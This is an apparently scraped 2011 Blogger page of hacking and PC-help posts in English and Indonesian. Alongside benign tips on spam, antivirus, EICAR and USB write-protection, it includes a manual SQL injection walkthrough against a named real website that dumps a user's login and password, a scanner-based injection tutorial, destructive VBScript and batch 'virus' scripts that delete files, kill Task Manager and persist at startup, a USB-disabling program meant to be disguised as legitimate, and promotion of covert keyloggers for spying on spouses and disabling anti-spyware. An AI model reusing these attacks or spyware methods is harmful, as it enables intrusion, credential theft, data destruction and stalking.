This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

music

visitors

free counters

Minggu, 17 Juli 2011

How to Monitor a Remote Computer


Monitor Remote ComputerMost of the time, it becomes necessary for us to monitor our own computer or a remote computer to keep track of the activities going on. This may be for several reasons. Especially it is most necessary for the parents to monitor their computer to keep track of their children’s activities during their absence. Some people may also require to monitor their computer to keep an eye on the activities of their spouse or partner.
Today, with the advancement in the field of software technology, it is possible to easily monitor any given computer. For this all you have to do is, use a PC Monitoring Software.
But the job doesn’t end here. This is because, there exists tons of such monitoring softwares on the market and many times people often get confused which one to choose and how to use them. So I have decided to make this job simpler for you, by writing this post. In this post I’ll give a detailed information about computer monitoring softwares which include their features, advantages, installation, usage procedure and so on. To make this post interesting, let’s take up each topic in the form of a question and answer.
 
What exactly is a Monitoring Software and how can it help me?
A computer monitoring software is just like any other software (program) which when installed, secretly monitors each and every activity that takes place on the computer. The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as Keyloggers.
 
How can I install a monitoring software?
Installing a monitoring software is too simple. During the installation, you need to setup a secret password and hotkey combination which is required later to see the recorded data ( logs). After the installation is complete the software goes invisible, but keeps running in the background. Whenever you want to see the logs, just press the hotkey combination (ex. Shift+Ctrl+F10). Now a small window will popup asking for a password. Here you need to enter the password that was setup during the installation time. After you enter the password you’ll be able to see all the activities that took place on the computer during your absence.
 
Can the person using the computer come to know about the presence of the Monitoring Software?
Most of the time it becomes impossible to detect the presence of the monitoring software. This is because, once installed it hides itself from Start menu, Program Files, Control Panel, Task manager etc. Because of it’s stealth behaviour the user can never come to know that he/she is under the presence of monitoring.
 
Which Monitoring Software should I use?
There exists different flavours of these softwares and you have to choose the one that best match your needs. Here is a list of some of the best monitoring programs that I recommend.
 

For Monitoring a Local PC:

 
If you want to monitor a local PC (may be your own PC) then the following program is recommended.
You can find a Complete Installation Guide for Spy Agent Stealth HERE
 

For Monitoring a Remote PC (Also works on local PC):

 
If you want to monitor a remote PC  you may use the following programs. These programs works for remote PC as well as local PC.
SniperSpy
 

For Monitoring a Network:

 
The following program can be used to monitor an Entire Network of computers from one central location. This becomes handy to monitor the staff in a company or students in a school/college.
NetVizor
You can find a Complete Installation Guide for NetVizor HERE
 

For monitoring a Cell Phone from your PC:

 
If you want to monitor a Cell Phone from your PC you can refer the following link:
Cell Phone Spy
I hope this helps. Pass your comments.

How to Protect an Email Account from SPAM


Stop SPAMMost of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.
What is SPAM?
Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.
Where do these SPAM come from?
These spam come only from spammers and never from a legitimate user or a company. These spammers send a single email to hundreds (some times thousands or millions) of email addresses at a time. They either send it manually or use spambots to automate the process of spamming.
Why do spammers SPAM?
The main goal of spammers is to send the spam (unsolicited bulk messages) to as many people as possible in order to make profit. For example, John builds a small website to sell an ebook which gives information about weight loss. In order to make sales he needs publicity for his website. Instead of spending money on advertising, John decides to create an email which contains information about his site along with it’s link and send this email to say 100 email addresses in his contact list. If 1 person out of hundred buy this book john gets $10. What if he sends this email to 1000s of email addresses. He gets $100. Imagine, if he sends this email to 1 Million email addresses he gets $100000.
Now I hope you understood the idea behind spamming. So in order to make money, spammers send their advertising emails to as many people as possible without respecting the recipient’s privacy.
From where do SPAMmers get my email address?
On the Internet there exists many sites who collect the email IDs of people and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take up surveys. This is the time where these scam sites get their email addresses. Also many spammers collect email addresses by using spambots. These spambots collect email addresses from the Internet in order to build mailing lists. Such spambots are web crawlers that can gather email addresses from Web sites, newsgroups, forums, special-interest group (SIG) postings, and chat-room conversations.
Spammers also use the trick of creating Hoax Emails for gathering a huge list of email IDs. For example, a spammer sends a hoax email which says “Forward this Message to Help Severely Burned Child”. This email claims that 11 cents will be donated to the child’s family every time the message is sent to others. Most of the people believe this and start forwarding this hoax email to all of the IDs in their contact list. In this way the email spreads rapidly and eventually when it reaches the creator (spammer), the spammer gets a huge list of valid email addresses in the email header. When you get these kind of hoax emails, you can see for yourself in the email header which contains a huge list of email addresses of all those people to whom the email is being forwarded to. This is one of the effective methods used by spammers to gather email addresses.
Is SPAMming legal?
Spamming is completely illegal. Yet it is really difficult to stop spammers from spamming since they keep moving from one hosting company to another after getting banned. This makes it practically impossible to catch spammers and prosecute them.
How to protect my email account from getting SPAMmed?
The following methods can be used to combat email spam.
1. Use spam filters for your email account. If you’re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by defaut. Each spam filter has it’s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.
2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.
3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead singup for a dummy email account and use this for surveys and feedback forms.
4. While posting your contact email address on your website use this format: emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This protects your email address from being indexed by spambots.
5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at www.hoax-slayer.com. If you really want to forward it to your friends, make sure that you use “Bcc” (blind carbon copy) option to send the email. This will hide all the email IDs to which the mail is forwarded to.
I hope this helps. Pass your suggestions and feedback via comments.

12 Tips to Maintain a Virus Free Computer


Computer VirusIs your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.
1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that has it’s origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use a good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.
2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive. 
3. Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).
4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.
  • Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.
  • You can also use a pop-up blocker to automatically block those pop-ups.
5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG LinkScanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.
6. Install a good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virues. If PC security is your first option then it is recommended that you go for a shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides realtime security for your PC. Make sure that this feature is turned on.
7. Install a good Antispyware program, that operates against Internet malware and spyware.
8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.
9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.
10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.
11. While you download files from untrusted websites/sources such as torrents, warez etc. make sure that you run a virus scan before executing them.
12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other malicious programs.

A Virus Program to Disable USB Ports


Virus to disable USB portsIn this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).
I hope you like this post. Please pass your comments.

Which is the Best Computer Spy Software


Find out the Best Computer Spy Software


Best Spy SoftwareIf you are in search of the best Computer Spy Software on the Internet, then you’ve landed at the right place. In this post I will try to give my honest review of some of the top spy softwares on the market. Here you will find every possible information that you need to know before you make a choice of the right Spy software. So, I highly recommend that you read this post completely before you make your next move.
Since I have already discussed how to use these spy tools in my previous post How to Monitor Local or Remote PC, in this post I’ll only give the information on how to choose the best spy software.
Today, there is a huge demand for the spy softwares on the Internet since a lot of people want to monitor the activities of their children, spouse, friends etc. Some people also use these softwares to hack the email passwords of their friends or relatives. Due to this huge demand, a lot of substandard spy programs have started to step into the market.
As we all know there exists tons of spy softwares from number of companies and they all boast that, their software is the best. But can this be true? Absolutely not. The truth is, almost 80% of the spy programs available on the Internet are of substandard quality and fail to meet the minimum requirements. In the remaining 20% only 3-5% will manage to come on top and prove themselves to be successful. With this being the case, it is very much necessary to determine the best software before making a purchase. Here are some of the crucial criteria that you’ve to look into:
In addition to Keylogging, the spy software must have the following basic features:
1. Capture screenshots, chat-room, web and web-cam activities.
2. The spy software must possess a Remote Install Feature to monitor a Remote computer.
3. It must be able to detect and destroy anti-spyware softwares. As we all know, most computers today are equipped with anti-spy softwares. So, it is very much necessary that it is destroyed before the spy-software is installed.
4. It must remain undetected and run in a total stealth mode.
So, while choosing the best Spy-Software you must look for the above basic features. But unfortunately most of the spy programs on the internet fail to support Remote installation feature. Also they are easily detected by anti-spyware programs and hence they fail to succeed on PCs equipped with anti-spywares.
To make this job simpler for you, I have compiled some of the top Spy softwares on the web. The following Spy softwares support a remote install feature and are also able to counter anti-spywares.

Spy Software to Monitor a Local or Remote PC

SniperSpy allows you to remotely watch your computer like a television! Watch what happens on the screen LIVE! The only remote spy software with a SECURE control panel!
In my experience of more than 6 years, I have tested almost 50 spy softwares. Out of these, one of my favorite spy software is SniperSpy. The following are some of the reasons for which I recommend SniperSpy for you.
1. SniperSpy can be used to monitor your local computer as well as a remote computer. Since it supports remote installation feature, you can install it even on computers for which you do not have physical access.
2. On the whole Internet there exists only a few spy softwares that support remote installation and SniperSpy is the best among them.
3. You can view the LIVE screenshot of the remote computer. Not only screenshots, but also, you can see every activity on the remote comuter LIVE.
4. With SniperSpy you can take a complete control of the remote PC. You can logoff, restart or shutdown the remote PC right from your PC.
5. SniperSpy records every activity of the remote computer.
6. SniperSpy is completely stealth and remains undetected.
7. SniperSpy captures every keystroke that is typed. This includes email passwords, login passwords, instant messenger passwords etc.
8. SniperSpy has the ability to bypass any firewall.
9. SniperSpy is fully compatible with Windows 2000, XP, Vista, 7 and Mac.
Why SniperSpy is the best?
The following features makes SniperSpy stand out from the crowd:
1. Sniper Spy is more reliable than other spy softwares since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.
2. SniperSpy offers excellent customer support.
3. SniperSpy has got recognition from media such as CNN, BBC, CBS, Digit etc. Hence it is more reputed and trustworthy.
For more information on this program and download details visit the following links:

To Monitor a Network of Computers

The following program can be used to monitor an Entire Network of computers from one central location. This becomes handy to monitor the staff in a company or students in a school/college.
You can find a Complete Installation Guide for NetVizor HERE

To Monitor a PC from Cellphone

If you want to monitor your PC using your cellphone, you can use the following software/program.
After reading this post, I hope that you’re aware of the common spy software scams on the Internet. Choose the best spy software to fulfil your needs.
If you want to spy on cell phones refer my new post Cell Phone Spy – How to Spy on Cell Phones

Scaner Web 4 Fun




kali ini sya akan share tentang Tools dalam dunia hacking Website,,,cieee,,,illeeeee,,,,
Sobat semua, ini adalah tools untuk scan website apakah vuln ato tidak ??
soo,,,,,langung aja ane kasih tutor bwt semua tanpa pake lama dechhh,,,,,,,
masukkin url target.. misalnya http://www.target.com di sql injector
trus liat debugging window biar tau si program kerjanya ngapain
(menu settings -> show debug window, ato pencet ctrl+w)
bis itu pencet si tombol go
tunggu....
tunggu...
tunggu...
sampe ntar nongol url yg ada tanda seru dibelakangnya -> [!]
misal
code : http://www.target.com/ind/Read/?type=ixReg&id=590&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htm [!]
nah brarti itu 90% vuln
kamu boleh stop sekarang ato biarin si program nyari sqli bugs yg lain

klo udah stop.
skarang kmu masukkin yg url ada tanda serunya tadi,
jadi yg http://target.com tadi kamu ganti jadi
code : http://www.target.com/ind/Read/?type=ixReg&id=590&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htmtrus pencet go,

biarin dia nyari...
tunggu..
code : [ sqli bugs found ! ]
mssql : Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86)
Mar 3 2007 18:40:02
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.target.com/ind/Read/?type=ixReg&id=590'/**/AND/**/__TIME__=convert(int,__CODE__)--'&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htm
nah itu dia POC nya nongol sekalian.
yg __TIME__ itu kamu rubah jadi angka berapa aja,
yg __CODE__ itu tempat kodenya (select bla bla from bla bla)

klo nanti ternyata target vuln, tpi gak nongol db, table ato lain2,
kmu coba stop,restart, kasih url yg tanda seru tadi,
contreng di checkbox blind injection, klik go lagi
mungkin si target = blind sqli
udah versi 0.7
Link download :
http://tools.kerinci.net/download/kerinci-0.7.zip
di versi ini kmu tinggal klik aja

Manual SQL Injection


   


Target : http://www.natoleo.com/Content.php?id=14
1. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com
muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1)

2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')
http://www.natoleo.com/Content.php?id=14 order by 5--
jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)

3. Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter id=14 menjadi id=-14
http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5--
akan muncul "angka ajaib" : 1

4. Selanjutnya kita cari versi Database MySql-nya dengan perintah "version()" pada angka 1.
http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5--
muncul tulisan :5.0.51a-community

5. Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib dan " from information_schema.tables where table_schema=database()--" di belakang angka 5
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()--
muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,club_statuses,config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,links,links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,products,users_group,welcome

6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table "members"sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273
Perintah selanjutnya adalah "group_concat(column_name)" pada angka ajaib 1 dan " from information_schema.columns where table_name=0xHexa--" di akhir URL yaitu 6D656D62657273
tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273--
muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,club_status_id,member_date_added,security_level_id
kita ambil : member_login,member_password

7. Untuk melihat isi dari kedua column tersebut gunakan perintah "group_concat(column1,0x3a,column2)" pada angka ajaib 1 dan from NAMATABLE-- pada akhir URL
ganti column1 dengan "member_login" dan column2 dengan "member_password". 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan "members" untuk mengambil informasi dari table yang bernama"members"
http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members--
hasilnya akan muncul:
user: wilmarnatoleo
pass: natoleoP@ssword
sekarang tinggal login ke website target..

windows Scripting



  • Membuat Virus yang bisa membuat Kompi Restart
Masuk Notepad kemudian isi script di bawah ini :

@echo off
shutdown -r -f -t 00

Perintah ini hanya akan me-restart komputer Anda. Anda aman untuk mencobanya. Sama seperti script virus.bat, script di atas ini juga harus disimpan dengan ekstensi .bat, misalnya restart.bat

  • Membuat Virus yang bisa Restart / shutdown Kompi dalam Hitungan Detik
Masuk Notepad kemudian tulis script di bawah ini :

CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60, vbhide

Simpan script tersebut dalam bentuk file.vbs, misal : virusshutdown.vbs. Virus ini berfungsi untuk mematikan windows dalam waktu 60 sekon “shutdown -s-f -t 60"
s = untuk shutdown dan
r = untuk reboot\restart

  • Membuat Virus yang bisa menghapus Folder dalam Kompi
Masuk Notepad kemudian tulis script di bawah ini, agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:

On Error Resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” (menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” (menghapus folder antivirus di direktory C:\)

Contoh :
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”
Kemudian simpan script tersebut dalam bentuk file.vbs, misal: virusdeleted.vbs

  • Menjalankan Virus pada saat Startup Windows
Masuk Notepad kemudian tulis script di bawah ini:

On Error Resume Next
CreateObject(”WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs” (menjalankan virus yang berada di direktory c:\windows\system32 dengan nama virus.vbs)

Simpan script tersebut dalam bentuk file.reg, misal : virusstartup.reg

  • Membuat virus pembunuh proses Kompi

Virus ini digunakan untuk membunuh proses (proses adalah program yang sedang berjalan) misalnya kita akan membunuh proses taskmanager. Masuk Notepad kemudian tulis script di bawah ini :
On Error Resume Next
CreateObject(”WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide

Simpan script tersebut dalam bentuk file.vbs, misal: virustaskkill.vbs

How to Recover Deleted Files from Windows and Mac


How to Recover Deleted Files

 
Recover Deleted Files from Windows and MacHave you accidentally deleted your files from the Hard disk? Do you desperately want to recover them back? Well, you need not panic!
It is possible to recover the deleted files back from the hard disk  (even after you have Shift+Deleted)  provided you act as soon as you realize that the files are deleted and use the best deleted files recovery software.
In this post you will find a detailed information on how to recover the deleted files from your Windows PC or Mac.
 

How Does the File Recovery Process Works?

 
When you delete a file from your computer, (or even from the recycle bin) the file is not actually deleted. Unlike what most people think, the file is not permanantly deleted or dropped from your hard disk even if you have deleted them from the recycle bin.
Let’s take up a small example of a book containing 50 pages. Suppose when you delete the page 25, assume that only the entry in the index which points to the page 25 is deleted and not actually the page 25 itself. Likewise, when you delete a file from your hard disk, only the pointer which points to this file is removed and not actually the file itself. This file still exists intact and is 100% possible to recover it back in the original condition. In this condition, the file becomes invisible and hence appears to have been deleted.
Recovering the deleted files 100% back in the original condition is very much dependent on the efficiency of the Data Recovery software you use. So, it is necessary to make a right choice when it comes to the selection of file recovery software.  
Today, there exists hundreds of data recovery tools and softwares on the market which boast to recover 100% of all the deleted files back in the original condition. But in reality, most of these softwares are neither effective nor capable of recovering your files back. So, when it comes to Data Recovery, I recommend the following software as the best:
 
1. Stellar Phoenix Data Recovery (for Windows)
2. Stellar Phoenix Mac Data Recovery (for Mac)
 
Stellar Phoenix is one of the best company specializing in deleted files recovery services and solutions since 1993. Stellar’s Data Recovery Solutions encompasses a wide range of software for almost any data loss situation ranging from accidental formats to virus attacks to software malfunctions. Hence Stellar provides the best tools to recover deleted files with over 1,000,000 satisfied customers across 137 countries.
 

What are the Chances of Recovering my Files Back?

 
Since the operating system doesn’t immediately re-use the space from the deleted files, it is most certainly possible to recover the deleted files back in 100% original condition. It may take up a very long time for those files to be completely deleted since the modern hard disks have ample capacity. Hence the chances are too less that the space from the deleted files are re-used immediately.
So, it is really worth to try out the file recovery softwares like Stellar Data Recovery for Windows or Stellar Data Recover for Mac. Some files are reported to have been recovered even after years of it’s deletion. However, for the best results, it is recommended that you use the file recovery software as immediately as possible to recover your deleted files.
 

Recovering the Deleted Files

 
In order to recover the deleted files all you need to do is perform a scan (search) for the deleted files using a File Recovery Software. Please be informed that there is no manual way to recover the deleted files. The Phoenix Data Recovery software performs a thorough scanning of the hard disk sector by sector and will locate the existence of deleted files to restore them back in the original condition. It is the only software that supports 185 popular file types including Windows NT Registry, JPEG, MP4, GIF, BMP and MS Word files. The software offers rich graphical support and incorporates advanced scanning methods to completely scan and recover deleted files from your hard drive. With this recovery software, it is possible to
  • Recover FAT16, FAT32, VFAT, NTFS, and NTFS5 file system partitions
  • Recover deleted emails
  • Recover deleted documents
  • Recover deleted photos
  • Recover deleted music
  • Formatted Hard-Drive recovery
  • Recover files from USB Drives, CDs, DVDs and memory cards
  • Recover almost all the camera format files
Visit the following links for more information on Stellar Data Recovery
 
1. Stellar Phoenix Data Recovery (for Windows)
2. Stellar Phoenix Mac Data Recovery (for Mac)

Sabtu, 16 Juli 2011

How to Repair Registry of Windows PC


Registry Repair Tips
 
Repair Windows RegistryThis article explains how to inspect and repair registry errors in your Windows PC, so as to improve it’s overall performance. If you are a Windows user, then you will most probably be aware of the fact that the Windows registry gets corrupted over time resulting in an overall decreased performance of your computer.
At times, registry errors can also make your PC to freeze down and hang up every now and then causing a serious annoyance to the user. At this point, the registry needs a serious repair to bring your PC back to it’s life. Well, before I tell you how to repair the registry, lets see what causes the registry to get corrupted.
Registry errors may occur due to installing too many applications/softwares from time to time without verifying the publishers. This may create invalid entries in the registry hive leading to errors. With the Internet boom and the era of freeware with free downloads, people often install programs from untrusted sources which results in a serious damage to the registry. Since the registry is a crucial component of the Windows operating system, damage to this registry can cause the system performance to drop down significantly.
 

How to Repair the Registry?

 
The best and the easiest way to repair your registry is by using a Registry Repair Tool (Registry Cleaner). A Registry Cleaner will automatically scan the registry of your PC to find invalid entries and will repair them by removing the errors with in no time. A registry cleaner is the simple and safest solution to repair registry and bring your PC back to it’s life without the need to re-install the Windows.
 

Which Registry Cleaner is the Best?

 
Well, today there exists hundreds of Registry repair tools on the market and as a result, people often get confused at which one to go far. Hence, when it comes to the choice of Registry repair tool, we must be very selective since not all of them are the same.
On the Internet, there exists many such tools which are simply useless and doesn’t apply any significant fixes to the Windows registry. After trying many such useless products on my PC, I finally found one good product which actually made a magic to my PC performance. It is:
 

PC Health Advisor is one of the best and award winning registry cleaner tool that repairs registry to avoid PC errors such as unwanted shutdown, freezing, crashing and more. PC Health Advisor will
  • Repair registry and increases your PC performance by upto 70%
  • Repair registry to fix DLL errors and invalid shortcuts
  • Free up virtual memory to avoid error messages
  • Performs Defragmentation and Compression of the registry
  • Repair registry to fix blue screen errors, system crashes, startup errors and more…
PC Health Advisor is not just a Registry cleaner, rather it is a complete Optimization Toolkit for your PC. Visit PC Health Advisor Homepage for more information on this program.
 

Can I Manually Repair the Registry?

 
Windows registry has a very complex structure with hundreds of thousands of entries embedded in it. A corrupt registry may contain thousands of invalid entries and errors in it and hence it is impractical and almost impossible to manually inspect, find and repair those errors. Also manual registry repair involves serious risk and can lead to a total system breakdown if done improperly. Except you are a highly experienced Windows user or a Windows expert, users are not encouraged to tamper with the registry.
Hence, using a registry repair tool is the safest and easiest way to repair the registry and improve the overall performance of your PC. Registry repair tools will not only repair the registry but also maintains it’s health in a good condition so as to avoid any future damage to it. It is recommended that you periodically (daily or weekly) perform registry scans using these tools to repair the errors as and when they come up so that, you can keep your PC’s health at it’s best. Just repairing the Windows registry can make your PC blazing fast like never before!

How to Test the Working of your Antivirus – EICAR Test

How to Test the Working of your Antivirus – EICAR Test

Have you ever wondered how to test your Antivirus software to ensure it’s proper working? Well here is a quick and easy way to test your antivirus. The process is called EICAR test which will work on any antivirus and was developed by European Institute of Computer Antivirus Research. This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer. Here is a step-by-step procedure to test your antivirus.
1. Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
EICAR Test code
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
2. Rename the file from New Text Document.TXT to myfile.com
3. Now run the antivirus scan on this myfile.com file.
If the antivirus is functioning properly on your computer, then it should generate a warning and immediately delete the file upon scanning. Otherwise you may have to re-install your antivirus.
NOTE: Most antivirus will pop-out a warning message in the Step-1 itself
You can also place the myfile.com file in a ZIP or RAR file and run a scan on it so as to ensure whether your antivirus can detect the test string in the compressed archive. Any antivirus when scanning this file will respond exactly as it will do for a genuine virus/malicious code. This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence it is the safest method to test the proper functioning of any antivirus.

How to Write-Protect Your USB Flash Drive


How to Write-Protect USB Flash Drive

USB Write ProtectMany a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.
But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.
This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:
1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).
2. Navigate to the following Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
 3. Create a New Key named as StorageDevicePolicies. To do this right-click on Control, and click on New->Key and name it as StorageDevicePolicies.
4. Now right-click on  StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.
Write-Protect USB Drive





5. Double-click on WriteProtect and set the Value data to 1.
Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.
USB-Write Protect Error







To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.
Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection. Hence as an alternative way, there are many tools available to automatically enable/disable the write-protection feature. One of my favorite tool is USB Write Protect by Naresh Manadhar. Using this tool you can limit write access to your USB drives with just a click of a button. You can download this tool from the following link:

10 Tips for a Total Online Security


With the sudden rise in the Internet usage across the globe over the past few years, there has also been a rise in the amount of online scams and frauds. Today most of the Internet users are unaware of the most prevailing online threats which pose a real challenge for their safe Internet usage. As a result, Online Security has become a questionable factor for the most Internet users. However it is still possible to effectively combat online insecurity provided that the users are well aware of the common scams and frauds and know how to protect themselves. A study shows that over 91% of the Internet users are unaware of the online scams and are worried about their security. Well if you are one among those 91% then here is a list of 10 tips to ensure your total online security.
